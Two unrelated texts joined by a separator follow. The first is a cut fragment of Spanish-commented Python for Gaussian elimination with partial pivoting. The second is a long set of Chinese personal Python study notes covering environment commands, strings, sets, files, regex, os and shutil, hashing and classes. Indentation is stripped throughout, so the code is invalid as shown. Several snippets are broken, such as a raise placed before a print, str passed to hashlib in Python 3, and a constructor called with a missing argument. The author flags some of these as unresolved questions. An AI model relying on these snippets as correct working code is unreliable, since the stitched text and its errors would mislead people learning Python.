for i in range(0, n - 1, 1):
columna = abs(AB[i:, i])
dondemax = np.argmax(columna)
if (dondemax != 0):
temporal = np.copy(AB[i, :])
AB[i, :] = AB[dondemax + i, :]
AB[dondemax + i, :] = temporal
AB1 = np.copy(AB)
# eliminación progresiva
for i in range(0, n - 1, 1):
pivote = AB[i, i]
adelante = i + 1
for k in range(adelante, n, 1):
factor = AB[k, i] / pivote
AB[k, :] = AB[k, :] - AB[i, :] * factor
# sustitución recursiva
ultfila = n - 1
ultcolumna = m - 1
X = np.zeros(n, dtype=float)
for i in range(ultfila, 0 - 1, -1):
suma = 0
for j in range(i + 1, ultcolumna, 1):
suma = suma + AB[i, j] * X[j]
b = AB[i, ultcolumna]
X[i] = (b - suma) / AB[i, i]
X = np.transpose([X])
print('')
print('Matriz solución:')
print('')
print(AB0)
print('')
print('Pivoteo parcial por filas')
print('')
print(AB1)
print('')
print('eliminación progresiva')
print('')
print(AB)
print('')
print('solución: ')
print('')
print(X)
print('')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-12-08
# @Author : ${author} (${email})
# @Link : ${link}
# @Version : $Id$
计算机管理 compmgmt.msc
计算机服务 services.msc
管理员启动命令行 runas /user:administrator cmd
设置任务计划模块自动运行 sc config schedule start= auto
启动任务计划程序 taskschd.msc /s
pip install -U pip
pip list --oudated
pip search libname
pip install pkg -i https://pypi.tuna.tsinghua.edu.cn/simple/
=====================================================
pyinstaller -F/-D myfile.py #形成一个exe还是形成很多依赖文件,后者兼容性更好
-i myicon.ico -p packagepath
-w/-c # window/console
-n #为生成的exe起个名字
--key # 加密打包
pyi-makespec -F myfile.py # 生成spec文件
'''
RecursionError: maximum recursion depth exceeded
打开 myfile.spec 添加
import sys
sys.setrecursionlimit(1000000)
再次执行 pyinstaller -F myfile.spec -i myicon.ico
'''
# setup.py
# cython: language_level=3
from distutils.core import setup
from Cython.Build import cythonize
setup(
name='reconciliation',
ext_modules = cythonize('main.py')
)
$ python setup.py build_ext --inplace
=====================================================
# 列出
conda env list
# 创建
conda create -n your_env_name python=X.X #(2.7,3.6)
# 激活
Linux: source activate your_env_name(虚拟环境名称)
Windows: activate your_env_name(虚拟环境名称)
# 安装包
conda install -n your_env_name packagename
# 关闭
Linux: source deactivate
Windows: deactivate
# 删除
conda remove -n your_env_name --all
#---env----
python3 -m venv tutorial-env
#在Windows上,运行:
tutorial-env\Scripts\activate.bat
#在Unix或MacOS上,运行:
source tutorial-env/bin/activate
#退出
deactivate
========================================================
import pip
from subprocess import call
for dist in pip.get_installed_distributions():
call("pip install -U " + dist.project_name,shell=True)
conda:
添加清华源
conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/
conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main/
更新所有包
conda update --all
jupyter config:
jupyter notebook --generate-config
pip install jupyter_contrib_nbextensions
jupyter contrib nbextension install --user
pip install jupyterthemes
jt -t monokai -fs 12 -T -N -tf ubuntu -tfs -10 -dfs 8 -ofs 10 -cellw 80% -lineh 130 -cursw 3
=======================遍历循环===================================
tups = {"name": "mengmeng", "looks": "beautiful", "age": 24}
for a, b in tups.items():
print("%s:%s" % (a, b))
student = ["xiaomeng", "xiaozhi", "xiaoqiang"]
number = ["1002", "1003", "1004"]
for i in range(len(student)):
print(student[i], "的学号是: ", number[i])
for a, b in zip(student, number):
print(a, "的学号是: ", b)
========================函数========================================
# 定义阶乘函数-------------------------------------------------
def fact_iter(x, y):
if x == 1:
return y
return fact_iter(x - 1, x * y)
def fact(n):
return fact_iter(n, 1)
# 匿名函数------------------------------------------------------
c = lambda x, y=10: y**x
print([i for i in filter(lambda x: x > 3, [1, 2, 3, 4, 5])])
========================类======================================
class Student(object):
def __init__(self, name, score): # 类中的构造方法__init__(初始化)
self.__name = name # 类的属性(私有变量)
self.__score = score # 类的属性(私有变量)
def info(self): # 类中的非构造方法
print("学生:%s;分数:%s" % (self.__name, self.__score))
def get_score(self): #定义方法:可以外部访问私有变量
return self.__score
def modify_score(self,score): #定义方法:可以外部修改私有变量
if score in range(0,100): #为什么还是能改成105也不提示???
self.__score = score
else:
print("分数应该是0到100的数字")
stu = Student("小萌",95) #类的实例化
stu.info() #通过实例变量引用类中方法info()
print(stu.get_score()) #通过定义的方法访问私有变量
stu.modify_score(59) #通过定义的方法修改私有变量
print(stu.get_score())
# 多重继承----------------------------------------------------
class Animal(object):
pass
class Mammal(Animal):
pass
class Bird(Animal):
pass
class Dog(Mammal):
pass
class Bat(Mammal):
pass
class Parrot(Bird):
pass
class Ostrich(Bird):
pass
class Runnable(object):
def run(self):
print("running")
class Flyable(object):
def fly(self):
print("flying")
class Dog(Mammal,Runnable):
pass
class Bat(Mammal,Flyable):
pass
class type_dect(object):
def __str__(self):
return "地上跑的动物"
__repr__=__str__
========================异常======================================
#try/except/else/finally的组合使用
def a_divid_b(a,b):
try:
c = a/b
except (ZeroDivisionError,SyntaxError,NameError) as e:
raise
print (e)
else:
return c
finally: #不是说finally子句最后执行吗?结果好像不是??
print("this is a error capture programming")
a_divid_b(2, 1)
a_divid_b(2, 0)
======================时间和日期====================================
%a 简化星期名称 %m 月份
%A 完整星期名称 %M 分钟
%b 简化月份名称 %S 秒数
%B 完整月份名称 %y 去掉世纪的年份
%d 一个月中的天数 %Y 完整年份
%H 一天中的小时数 %F %Y-%m-%d的简写形式
%w 一星期中的第几天(0是星期天) %D %m-%d-%y的简写形式
%W 一星期中的第几天(0是星期一)
import time,datetime,calendar
# 对象为时间戳--------
time.time() #时间戳
time.localtime() #本地时间
time.gmtime() #0时区时间(UTC)
time.ctime() #将时间戳转化为'Sat Dec 9 22:00:12 2017'
# 对象为时间元组struct_time--------
t = time.localtime() #本地时间形成的元组
time.mktime(t)#转化为时间戳
time.asctime(t) #'Sat Dec 9 22:00:12 2017'
time.strftime("%Y-%m-%d", t) #返回以字符串表示的时间strftime(format,tuple)
time.strptime("Sat Dec 9 22:00:12 2017", "%a %b %d %H:%M:%S %Y") #将字符串时间转化为时间元组
# 功能型时间函数
clock()#返回进程时间
time.sleep()#延迟时间
#datetime模块----------------
datetime.datetime.today()
datetime.datetime.now(tz)
datetime.timedelta(hours=3)#默认3天
# ......
dt=datetime.datetime.now()
dt.strftime("%Y-%m-%d %H:%M:%S")
#regex--------------
import re
re.match("hello", "hello world").span()
========================文件操作======================================
# 打开文件--
open("path","w+","buffering",encoding="utf-8")
# 读取文件--
open().read("byte")
open().readline(" ")
open().readlines(list) #读取对象为列表
# 写入文件--
open().write("byte")
open().writeline(" ")
open().writelines(list) #写入对象为列表
# 关闭文件--
open().close()
with open() as f:
open().write(" ") #with自动调用close(),替代try/finally复杂命令
#文件重命名和删除--
os.rename(old,new)
os.remove(" ")
#文件内容迭代----
file = open("path")
while True:
txt = file.read(1) #按字节迭代,txt = file.readline(1)->按行迭代
if not txt:
break
print(txt)
file.close()
#懒加载式迭代-for循环----
import fileinput
for line in fileinput.input(path):
print (line)
#StringIO()函数----
from io import StringIO
io_str = StringIO("Hello\nWorld\nWelcome")
while True:
line = io_str.readline()
if line =="":
break
print(line.strip())
StringIO().write("")
StringIO().readline()
StringIO().getvalue()
===================序列化与反序列化====================================
------python独有---------------
import pickle
# 内存->文件:pickle.dump()/pickle.dumps()-后者先读取为bytes.
dic =dict(name="萌萌",num=6017)
pickle.dumps(dic) #将数据通过特殊的形式转化为只有python语言认识的字符串
pickle.dump(dic) #将数据通过特殊的形式转化为只有python语言认识的字符串,并写入文件
try:
file1 = open("./Files/Pyfiles/dump.txt","wb")
pickle.dump(dic,file1)
finally:
file1.close()
# 文件->内存:pickle.load()/pickle.loads()-后者先读取为bytes.
try:
file1 = open("./Files/Pyfiles/dump.txt","rb")
pickle.load(file1)
finally:
file1.close()
------通用JSON序列化--------------
#处理的是字符串--
json.dumps()--序列化(编码) #将数据通过特殊的形式转化为所有程序语言都认识的字符串
json.loads()--反序列化(解码)
# 处理的是文件--
json.dump() #将数据通过特殊的形式转化为所有程序语言都认识的字符串,并写入文件
json.load()
import json
dic =dict(name="萌萌",num=6017)
json_dstr=json.dumps(dic)
print(json_dstr)
json_lstr=json.loads(json_dstr)
print(json_lstr)
repr() # 接收任何对象返回字符串的表达形式
=======================字符串操作===============================
all([1,-5,3])#判断列表或元组所有元素非零返回Ture
any([]) #只要有一个元素非零,则返回Ture,全部为零返回False
------
name = "my \tname is {name} and i am {year} old"
name.capitalize() #大写
name.count("a") #计数
name.center(50,"-") #字符串居中,总长度50,不足处以-代替
name.ljust(50,'*') #字符串居左,总长度50,不足处以*代替
name.rjust(50,'-') #字符串居右,总长度50,不足处以-代替
name.endswith("ex") #以ex结尾
name.expandtabs(tabsize=30)#以tab隔开,tab长度为30
name.find("name") #查找name所在位置
name.format(name='alex',year=23)
name.format_map({'name':'alex','year':12})
-------
'ab23'.isalnum() #判断是否字母和数字
'abA'.isalpha() #判断是否是字母
'1A'.isdigit() #判断是否是数字
'My Name Is '.istitle() #判断是否首字母均大写(标题)
'My Name Is '.isupper() #判断是否大写
'+'.join( ['1','2','3']) #以+进行连接
'Alex'.lower() #小写
'Alex'.upper() #大写
' Alex\n'.strip() #去除空白
'\nAlex'.lstrip() #去除左空白
'Alex\n'.rstrip() #去除右空白
-------
p = str.maketrans("abcdefli",'123$@456') #生成对应规则
"alex li".translate(p) #按照对应规则翻译
-------
'alex li'.replace('l','L',1) #字符替换
'alex lil'.rfind('l') #从右开始查找位置
'1+2+3+4'.split('+') #按+分割,返回列表
'1+2\n+3+4'.splitlines() #按行分割
'Alex Li'.swapcase() #大小写互相转换
'lex li'.title() #首字母大写
'lex li'.zfill(50) #长度50,不足处以zero代替?
'1A'.isdecimal()
'a 1A'.isidentifier()#判读是不是一个合法的标识符
'33A'.isnumeric() #判断是否是整数?
=======================集合操作=======================================
list_1 = [1,4,5,7,3,6,7,9]
set_1 = set(list_1)
set_2 =set([2,6,0,66,22,8,4])
print(set_1,set_2)
---交集---
print(set_1.intersection(set_2))
print(set_1 & set_2)
---并集---
print(set_1.union(set_2))
print(set_2 | set_1)
---差集---
print(set_1.difference(set_2)) #在集合1中而不在集合2中
print(set_2.difference(set_1)) #在集合2中而不在集合1中
print(set_1 - set_2)
---子集---
set_3 = set([1,3,7])
print(set_3.issubset(set_1)) #判断集合3是否是集合1的子集
print(set_1.issuperset(set_3)) #判断集合1是否是集合3的子集
---对称差集---
print(set_1.symmetric_difference(set_2)) #去掉共同元素,返回一个互异元素集合
print(set_1 ^ set_2)
---交集判断---
set_4 = set([5,6,7,8])
print(set_3.isdisjoint(set_4)) #判断集合3与集合4是否有交集,无交集返回Ture
---增加集合元素---
set_1.add(999)
set_1.update([888,777,555])
print(set_1)
---删除集合元素---
set_1.pop() #出栈,即去掉末尾元素
set_1.discard(888)
============================内置模块====================================
---------re---------
#基本语法
'.' #默认匹配除\n之外的任意一个字符,若指定flag DOTALL,则匹配任意字符,包括换行
'^' #匹配字符开头,若指定flags MULTILINE,这种也可以匹配上(r"^a","\nabc\neee",flags=re.MULTILINE)
'$' #匹配字符结尾,或re.search("foo$","bfoo\nsdfsf",flags=re.MULTILINE).group()也可以
'*' #匹配*号前的字符0次或多次,re.findall("ab*","cabb3abcbbac") 结果为['abb', 'ab', 'a']
'+' #匹配前一个字符1次或多次,re.findall("ab+","ab+cd+abb+bba") 结果['ab', 'abb']
'?' #匹配前一个字符1次或0次
'{m}' #匹配前一个字符m次
'{n,m}' #匹配前一个字符n到m次,re.findall("ab{1,3}","abb abc abbcbbb") 结果'abb', 'ab', 'abb']
'|' #匹配|左或|右的字符,re.search("abc|ABC","ABCBabcCD").group() 结果'ABC'
'[...]' #用来表示一组字符,如[abc]用来匹配a,b或者c
'[^...]'#不在[]中的字符:[^abc] 匹配除了a,b,c之外的字符。
'(?iLmsux[:re])' #指定编译选项,可添加-号表示关闭如(?-i)。
#但注意选项的有效范围是整条规则,即写在规则的任何地方,选项都会对全部整条正则式有效。
# i = IGNORECASE ;
# L = LOCAL ;
# m = MULTILINE ;
# s = DOTALL ;
# u = UNICODE ;
# x = VERBOSE 。
'(?# )' #注释。(?# )之间的内容将被忽略。
'(?<=…)' #前向界定,后向搜索 注:不可以在前向界定的括号里写正则式
#括号中 … 代表希望匹配的字符串的前面应该出现的字符串。
'(?=…)' #后向界定,前向搜索 注:可以在后向界定写正则式
#括号中的 …代表希望匹配的字符串后面应该出现的字符串。
'(?<!...)' # 前向非界定
# 当希望的字符串前面不是'…'的内容时才匹配
'(?!...)' #后向非界定
#当希望的字符串后面不跟着…内容时才匹配。
'*?' '+?' '??' #加?表示最小匹配,即懒惰
'\A' #只从字符开头匹配,re.search("\Aabc","alexabc") 是匹配不到的
'\Z' #匹配字符结尾,同$
'\d' #匹配数字0-9
'\D' #匹配非数字
'\w' #匹配[A-Za-z0-9]
'\W' #匹配非[A-Za-z0-9]
'\s' #匹配空白字符、\t、\n、\r , re.search("\s+","ab\tc1\n3").group() 结果 't'
'\S' #匹配任意非空字符
'\G' #匹配最后匹配完成的位置
'\b' #匹配一个单词边界,也就是指单词和空格间的位置。例如,'er\b' 可以匹配"never" 中的 'er',但不能匹配 "verb" 中的 'er'。
# '\b左边界.*右边界\b' \b可以就理解为空格位置
'\B' #匹配非单词边界。'er\B' 能匹配 "verb" 中的 'er',但不能匹配 "never" 中的 'er'。
'\1...\9'#匹配第n个分组的子表达式。
'组的用法'
'(...)' #无命名组
#re.search("(abc){2}a(123|456)c", "abcabca456c").group() 结果 abcabca456c
'(?P<name>...)' #命名组
'''分组匹配 re.search("(?P<province>[0-9]{4})(?P<city>[0-9]{2})(?P<birthday>[0-9]{4})",
"371481199306143242").groupdict("city")
结果{'province': '3714', 'city': '81', 'birthday': '1993'}'''
'(?P=name)' #命名组的调用
'\number' #通过序号调用已匹配的组,每个组都有一个序号,从左到右从1开始.0号组为整个正则式本身。
'(?: re)' #类似 (...), 但是不表示一个组,称为无捕获组
'(?(group_id/name)yes-pattern|no-pattern)'#条件匹配功能。判断指定组是否已匹配,执行相应的规则。
'注意:'
# re.search((...).+(...)).group(id|name) 是懒惰查找,返回包含组信息的第一个结果,即默认0组
# re.search((...).+(...)).groups() 也是懒惰查找,只返回第一个匹配结果的组信息
# re.findall((...).+(...)) 全查找,但只返回组信息
"关于 '|' 要注意两点:"
#第一,它在'[]'之中不再表示或,而表示他本身的字符。
#第二,它的有效范围是它两边的整条规则,比如'dog|cat'匹配的是'dog'和'cat',而不是'g'和'c'。
#如果想限定它的有效范围,必需使用一个无捕获组'(?: )'包起来。
#比如要匹配 'I have a dog'或'I have a cat',需要写成
# r'I have a (?:dog|cat)’,而不能写成 r'I have a dog|cat'
#最常用的匹配语法
re.match() #从头开始匹配
re.match().group([index|id]) #获取匹配的组,缺省返回组 0, 也就是全部值
re.match().groups() # 返回全部的组
re.compile().groupdict() #返回以组名为key,匹配的内容为 values 的字典
re.search() #匹配包含
re.search().start()
re.search().end()
re.search().expand(template) #根据一个模版用找到的内容替换模版里的相应位置
re.findall() #把所有匹配到的字符放到列表中返回
re.split() #以匹配到的字符当做列表分隔符
re.sub() #匹配字符并替换
re.subn() #匹配字符串并替换,同时会返回替换次数
re.escape(r'(*+?)') #跳过re的符号功能,表示其本身.
re.compile(pattern)
re.compile().flags
re.compile().pattern
re.compile().groupindex
#反斜杠的困扰
'''与大多数编程语言相同,正则表达式里使用"\"作为转义字符,这就可能造成反斜杠困扰。
假如你需要匹配文本中的字符"\",那么使用编程语言表示的正则表达式里将需要4个反斜杠"\\\\":
前两个和后两个分别用于在编程语言里转义成反斜杠,转换成两个反斜杠后再在正则表达式里转义成一个反斜杠。
Python里的原生字符串很好地解决了这个问题,这个例子中的正则表达式可以使用r"\\"表示。
同样,匹配一个数字的"\\d"可以写成r"\d"。有了原生字符串,你再也不用担心是不是漏写了反斜杠,
写出来的表达式也更直观。'''
#匹配模式flags
flags=re.I(re.IGNORECASE) #忽略大小写(括号内是完整写法,下同)
flags=re.M(MULTILINE) #多行模式,改变'^'和'$'的行为(参见上图)
flags=re.S(DOTALL) #点任意匹配模式,改变'.'的行为
---------random----------
random.random() #生成一个0到1的随机浮点数
random.uniform(a,b) #生成一个指定范围a到b的随机浮点数
random.randint(a,b) #生成一个[a,b]的随机整数
random.randrange(a,b,step=c) #步长为c,从[a,b)随机取一个数
random.choice(sequence) #从序列中随机获取一个元素,在python中list、tuple、character都属于sequence
random.sample(sequence,k) #从指定序列中获取指定长度k的片段
random.shuffle(sequence) #对序列进行随机排列(洗牌)
---------glob----------
glob.glob(path) # 将路径作为列表返回
---------OS-------------
os.getcwd() #类似linux系统中的pwd
os.chdir() #cd
os.curdir() #返回当前目录 "."
os.pardir() #获取父目录 ".."
os.makedirs("dirname1/dirname2") #生成多层目录层级
os.removedirs("dirname") #递归删除空目录
os.mkdir("dirname") #生成单级目录"mkdir dirname"
os.rmdir("dirname") #删除单级空目录"rmdir dirname"
os.listdir("dirname") #列出指定目录所有文件和子目录
os.remove() #删除一个文件
os.rename("oldname","newname") #重命名
os.stat("path/filename") #获取文件或者目录信息
os.system("bash command") #用于执行
os.path.abspath(path) #返回path规范化绝对路径
os.path.split(path) #将path分割为目录和文件二元组
os.path.dirname(path) #返回path的目录
os.path.basename(path) #返回path的文件名
os.path.exists(path) #判断path是否存在
os.path.isabs(path) #判断是否绝对路径
os.path.isfile(path) #判断是否是存在的文件
os.path.isdir(path) #判断是否是存在的目录
os.path.join(path1,path2,[...]) #返回组合路径
os.path.getatime(path) #返回path下的文件或目录最后存取时间
os.path.getmtime(path) #返回path下的文件或目录最后修改时间
os.sep #输出操作系统特定的路径分隔符win:\\,linux:/
os.linesep #输出行终止符 win:\t\n,linux:\n
os.pathsep #输出文件路径分隔符
os.name #输出指示当前系统的字符串win:"nt",linux:"posix"
os.environ #输出环境变量
--------sys---------
sys.argv #读取命令行参数列表,argv[0]是代码本身文件路径,argv[1]是第一个参数
sys.exit()
sys.version
sys.path #返回模块的搜索路径
sys.platform #返回操作系统平台名称
sys.maxint #最大的int值 ?
sys.stdout.write("please:")
val = sys.stdin.readline()[:-1] #?
-----shutil---------文件、文件夹、压缩包的处理模块
shutil.copyfileobj(fsrc, fdst[, length]) #将文件fsrc内容拷贝到另一个文件fdst中,可以部分内容length
shutil.copyfile(src, dst) #拷贝文件
shutil.copymode(src, dst) #仅拷贝权限,内容、组、用户均不变
shutil.copy(src, dst) #拷贝文件和权限
shutil.copystat(src, dst) #拷贝状态信息,包括:mode bits, atime, mtime, flags
shutil.copy2(src, dst) #拷贝文件和状态信息
shutil.copytree(src, dst, symlinks=False, ignore=None) #递归的去拷贝文件(拷贝目录)
shutil.rmtree(path[, ignore_errors[, onerror]]) #递归的去删除文件(删除目录)
shutil.move(src, dst) #递归的去移动文件(移动目录)
---压缩---
shutil.make_archive(base_name, format,...) #创建压缩包并返回文件路径
'''
base_name: 压缩包的文件名,也可以是压缩包的路径。只是文件名时,则保存至当前目录,否则保存至指定路径
format: 压缩包种类,“zip”, “tar”, “bztar”,“gztar”
root_dir:要压缩的文件夹路径(默认当前目录)
owner: 用户,默认当前用户
group: 组,默认当前组
logger: 用于记录日志,通常是logging.Logger对象
将 /Users/wupeiqi/Downloads/test 下的文件打包放置 /Users/wupeiqi/ 下,命名为"www"
shutil.make_archive("/Users/wupeiqi/www", 'gztar', root_dir='/Users/wupeiqi/Downloads/test')
'''
---解压---
shutil 对压缩包的处理是调用 ZipFile 和 TarFile 两个模块来进行的,详细:
import zipfile
# 压缩
z = zipfile.ZipFile('laxi.zip', 'w')
z.write('a.log')
z.write('data.data')
z.close()
# 解压
z = zipfile.ZipFile('laxi.zip', 'r')
z.extractall()
z.close()
import tarfile
# 压缩
tar = tarfile.open('your.tar','w')
tar.add('/Users/wupeiqi/PycharmProjects/bbs2.zip', arcname='bbs2.zip')
tar.add('/Users/wupeiqi/PycharmProjects/cmdb.zip', arcname='cmdb.zip')
tar.close()
# 解压
tar = tarfile.open('your.tar','r')
tar.extractall() # 可设置解压地址
tar.close()
----------xml.etree.ElementTree-----------
xml.etree.ElementTree.parse("xml文档").getroot().tag
xml.etree.ElementTree.parse("xml文档").getroot().iter("节点")
xml.etree.ElementTree.parse("xml文档").getroot().remove("节点")
import xml.etree.ElementTree as ET
tree = ET.parse("xmltest.xml") #解析xml文档
root = tree.getroot() #获取xml所有节点
print(root.tag) #'data'
# 遍历xml文档
for a in root:
print(a.tag, a.attrib) #遍历子节点
for b in a:
print(b.tag, b.text,b.attrib) #遍历孙节点
# 只遍历year 节点
for node in root.iter('year'):
print(node.tag, node.text)
#修改
for node in root.iter('year'):
new_year = int(node.text) + 1
node.text = str(new_year)
node.set("updated","yes")
tree.write("xmltest.xml")
#删除
for country in root.findall('country'):
rank = int(country.find('rank').text)
if rank > 50:
root.remove(country)
tree.write('output.xml')
#创建
new_xml = ET.Element("personinfolist")
personinfo = ET.SubElement(new_xml, "personinfo", attrib={"enrolled": "yes"})
name = ET.SubElement(personinfo, "name")
name.text = "Alex Li"
age = ET.SubElement(personinfo, "age", attrib={"checked": "no"})
sex = ET.SubElement(personinfo, "sex")
age.text = '56'
personinfo2 = ET.SubElement(new_xml, "personinfo", attrib={"enrolled": "no"})
name = ET.SubElement(personinfo2, "name")
name.text = "Oldboy Ran"
age = ET.SubElement(personinfo2, "age")
age.text = '19'
et = ET.ElementTree(new_xml) # 生成文档对象
et.write("test.xml", encoding="utf-8", xml_declaration=True)
ET.dump(new_xml) # 打印生成的格式
---------------configparser-------------
#生成配置文件-----configparser.ConfigParser()
import configparser
config = configparser.ConfigParser()
config["DEFAULT"] = {'ServerAliveInterval': '45',
'Compression': 'yes',
'CompressionLevel': '9'}
config['bitbucket.org'] = {}
config['bitbucket.org']['User'] = 'hg'
config['topsecret.server.com'] = {}
topsecret = config['topsecret.server.com']
topsecret['Host Port'] = '50022' # mutates the parser
topsecret['ForwardX11'] = 'no' # same here
config['DEFAULT']['ForwardX11'] = 'yes'
with open('example.ini', 'w') as configfile:
config.write(configfile)
#读取配置文件内容----config.read(),config.sections()
config.read('example.ini')
['example.ini']
config.sections() #输出节点
['bitbucket.org', 'topsecret.server.com']
'bitbucket.org' in config
True
config['bitbucket.org']['User']
'hg'
config['DEFAULT']['Compression']
'yes'
import ConfigParser
config = ConfigParser.ConfigParser()
config.read('i.cfg')
#按节点读取----
secs = config.sections()
print secs
options = config.options('group2')
print options
item_list = config.items('group2')
print item_list
val = config.get('group1','key')
val = config.getint('group1','key')
#改写-------
sec = config.remove_section('group1')
config.write(open('i.cfg', "w"))
sec = config.has_section('wupeiqi')
sec = config.add_section('wupeiqi')
config.write(open('i.cfg', "w"))
config.set('group2','k1',11111)
config.write(open('i.cfg', "w"))
config.remove_option('group2','age')
config.write(open('i.cfg', "w"))
------------hashlib加密模块----------
import hashlib
----md5----
hash = hashlib.md5()
hash.update("HelloIt's me天王盖地虎".encode(encoding="utf-8"))
print(hash.hexdigest())
----sha1----
hash = hashlib.sha1()
hash.update('admin')
print(hash.hexdigest())
----sha256----
hash = hashlib.sha256()
hash.update('admin')
print(hash.hexdigest())
----sha384----
hash = hashlib.sha384()
hash.update('admin')
print(hash.hexdigest())
----sha512----
hash = hashlib.sha512()
hash.update('admin')
print(hash.hexdigest())
----hmac----#更牛逼的加密模块
import hmac
h = hmac.new(b"12345","you are 250你是".encode(encoding="utf-8"))
print(h.digest()) #十进制
print(h.hexdigest()) #十六进制
===================面向对象编程===========================
class Dog(object):
def __init__(self,name):
self.name = name
def singledog(self):
print("%s:汪汪汪。。。"% self.name)
Dog("小郑子").singledog()
class Role(object):
n = 123 #类变量:共有属性,节省内存
n_list = []
name = "我是类name"
def __init__(self, name, role, weapon, life_value=100, money=15000):
#构造函数:__init__在实例化时做一些类的初始化的工作
self.name = name #实质为r1.name=name,实例变量(静态属性),作用域就是实例本身
self.role = role
self.weapon = weapon
self.__life_value = life_value #私有属性
self.money = money
def __del__(self):
#析构函数:__del__在实例释放、销毁的时候自动执行的,通常用于做一些收尾工作,如关闭一些数据库连接,关闭打开的临时文件
print("%s 彻底死了。。。。" %self.name)
def show_status(self): #定义一个方法查看私有属性
print("name:%s weapon:%s life_val:%s" %(self.name,self.weapon, self.__life_value))
def __shot(self): #私有方法
print("shooting...")
def got_shot(self):# 类的方法,功能 (动态属性)
self.__life_value -=50
print("%s:ah...,I got shot..."% self.name)
def buy_gun(self, gun_name):
print("%s just bought %s" % (self.name,gun_name))
r1 = Role('Chenronghua','police','AK47') #把一个类变成一个具体对象的过程叫 实例化(初始化一个类Role,造了一个对象r1)
r1.buy_gun("AK47")
r1.got_shot()
r1.__shot() #私有方法,无法外部调用
print(r1.show_status())
r2 = Role('jack', 'terrorist', 'B22') #生成一个角色
r2.got_shot()
-----继承-----
class People(object): #新式类
def __init__(self,name,age):
self.name = name
self.age = age
self.friends = []
print("--doens't run ")
def eat(self):
print("%s is eating..." % self.name)
def talk(self):
print("%s is talking..." % self.name)
def sleep(self):
print("%s is sleeping..." % self.name)
class Relation(object):
def __init__(self,n1,n2):
print("init in relation")
def make_friends(self,obj): #w1
print("%s is making friends with %s" % (self.name,obj.name))
self.friends.append(obj.name)
class Man(Relation,People):
def __init__(self,name,age,money):
# People.__init__(self,name,age) #调用People的__init__属性
super(Man,self).__init__(name,age) #新式类写法
self.money = money
print("%s 一出生就有%s money" %(self.name,self.money))
def piao(self):
print("%s is piaoing ..... 20s....done." % self.name)
def sleep(self):
People.sleep(self)
print("man is sleeping ")
class Woman(People,Relation):
def get_birth(self):
print("%s is born a baby...." % self.name)
m1 = Man("NiuHanYang",22)
w1 = Woman("ChenRonghua",26)
m1.make_friends(w1)
w1.name = "陈三炮"
print(m1.friends[0])
----静态方法----
'''通过@staticmethod装饰器即可把其装饰的方法变为一个静态方法,
静态方法是不可以访问实例变量或类变量的,其实相当于跟类本身已
经没什么关系了,它与类唯一的关联就是需要通过类名来调用这个方法'''
class Dog(object):
def __init__(self,name):
self.name = name
@staticmethod #把eat方法变为静态方法
def eat(self):
print("%s is eating" % self.name)
d = Dog("ChenRonghua")
d.eat()
'''调用d.eat()会出错误,当eat变成静态方法后,通过实例调用时不会自动把实例本身当作一个参数传给self。
想让上面的代码可以正常工作有两种办法:
1. 调用时主动传递实例本身给eat方法,即d.eat(d)
2. 在eat方法中去掉self参数,但这也意味着,在eat中不能通过self.调用实例中的其它变量了'''
----类方法----
#通过@classmethod装饰器实现,类方法只能访问类变量,不能访问实例变量
class Dog(object):
#name = "我是类变量" #定义一个类变量
def __init__(self,name):
self.name = name
@classmethod
def eat(self):
print("%s is eating" % self.name)
d = Dog("ChenRonghua")
d.eat()
----属性方法----
#通过@property把一个方法变成一个静态属性
class Dog(object):
def __init__(self,name):
self.name = name
@property
def eat(self):
print(" %s is eating" %self.name)
d = Dog("ChenRonghua")
d.eat()
'''调用会出以下错误,说NoneType is not callable,
因为eat此时已经变成一个静态属性了, 不是方法了,
想调用已经不需要加()号了,直接d.eat就可以了'''
class Flight(object):
def __init__(self,name):
self.flight_name = name
def checking_status(self):
print("checking flight %s status " % self.flight_name)
return 1
@property
def flight_status(self):
status = self.checking_status()
if status == 0 :
print("flight got canceled...")
elif status == 1 :
print("flight is arrived...")
elif status == 2:
print("flight has departured already...")
else:
print("cannot confirm the flight status...,please check later")
@flight_status.setter #修改
def flight_status(self,status):
status_dic = {
0 : "canceled",
1 :"arrived",
2 : "departured"
}
print("\033[31;1mHas changed the flight status to \033[0m",status_dic.get(status) )
@flight_status.deleter #删除
def flight_status(self):
print("status got removed...")
f = Flight("CA980")
f.flight_status
f.flight_status = 2 #触发@flight_status.setter
del f.flight_status #触发@flight_status.deleter
----类的特殊成员方法----
1.__doc__ :表示类的描述信息
class Foo:
""" 描述类信息,这是用于看片的神奇 """
def func(self):
pass
print(Foo.__doc__)
2.__module__:表示当前操作的对象在那个模块
3.__class__ :表示当前操作的对象的类是什么
3. __init__:构造方法,通过类创建对象时,自动触发执行。
4.__del__:析构方法,当对象在内存中被释放时,自动触发执行。
'''此方法一般无须定义,因为Python是一门高级语言,程序员在使用时
无需关心内存的分配和释放,因为此工作都是交给Python解释器来执行,
所以,析构函数的调用是由解释器在进行垃圾回收时自动触发执行的'''
5.__call__:对象后面加括号,触发执行。
'''构造方法的执行是由创建对象触发的,即:对象 = 类名() ;而对于
__call__ 方法的执行是由对象后加括号触发的,即:对象() 或者 类()()'''
6.__dict__:查看类或对象中的所有成员属性、方法 #类/对象.__dict__
7.__str__:在打印对象时,默认输出该方法的返回值
8.__getitem__、__setitem__、__delitem__:用于索引操作,如字典。分别表示获取、设置、删除数据
class Foo(object):
def __getitem__(self, key):
print('__getitem__',key)
def __setitem__(self, key, value):
print('__setitem__',key,value)
def __delitem__(self, key):
print('__delitem__',key)
obj = Foo()
result = obj['k1'] # 自动触发执行 __getitem__
obj['k2'] = 'alex' # 自动触发执行 __setitem__
del obj['k1'] #触发执行 __delitem__
9.__new__, __metaclass__:#对象是通过执行类的构造方法创建,类对象是 type 类的一个实例,即:类是通过type类的构造方法创建
#__new__先于__init__执行
#metaclass 详解文章:http://stackoverflow.com/questions/100003/what-is-a-metaclass-in-python 得票最高那个答案写的非常好
----反射----
class Foo(object):
def __init__(self):
self.name = 'wupeiqi'
def func(self):
return 'func'
obj = Foo()
# 检查是否含有成员
hasattr(obj, 'name')
hasattr(obj, 'func')
# 获取成员
getattr(obj, 'name')
getattr(obj, 'func')
# 设置成员
setattr(obj, 'age', 18)
setattr(obj, 'show', lambda num: num + 1)
# 删除成员
delattr(obj, 'name')
delattr(obj, 'func')
==========================socket=================================
#http://www.cnblogs.com/wupeiqi/articles/5040823.html
==========================thread=================================
